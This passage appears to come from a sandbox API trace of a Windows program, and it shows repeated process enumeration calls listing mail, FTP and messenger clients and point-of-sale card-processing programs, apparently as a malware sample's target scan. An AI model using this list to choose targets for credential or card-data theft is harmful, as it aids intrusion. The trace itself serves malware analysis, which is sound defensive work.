cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0279.985] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0279.987] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0279.989] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0279.991] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0279.993] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0279.994] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0280.086] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0280.088] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0280.090] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0280.092] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0280.094] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0280.096] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0280.097] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0280.099] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0280.101] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0280.102] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0280.109] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0280.111] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0280.113] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0280.114] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0280.116] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0280.119] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0280.130] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0280.133] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0280.249] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0280.251] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0280.253] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0280.255] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0280.256] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0280.258] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0280.260] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0280.340] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0280.342] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0280.344] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0280.345] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0280.347] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0280.349] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0280.350] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0280.352] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0280.354] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0280.357] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0280.358] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0280.360] CloseHandle (hObject=0x21f8) returned 1 [0280.360] Sleep (dwMilliseconds=0x64) [0280.516] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0280.528] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0280.530] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0280.531] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0280.533] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.534] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0280.536] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0280.537] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0280.539] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0280.540] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0280.542] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.544] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.545] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0280.547] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.548] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.550] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.551] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.553] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.554] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.556] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.611] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0280.613] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0280.615] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0280.616] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.618] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0280.621] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0280.622] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0280.624] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0280.626] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0280.627] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0280.629] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0280.630] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0280.632] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0280.634] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0280.635] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0280.637] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0280.639] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0280.640] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0280.642] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0280.643] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0280.645] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0280.647] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 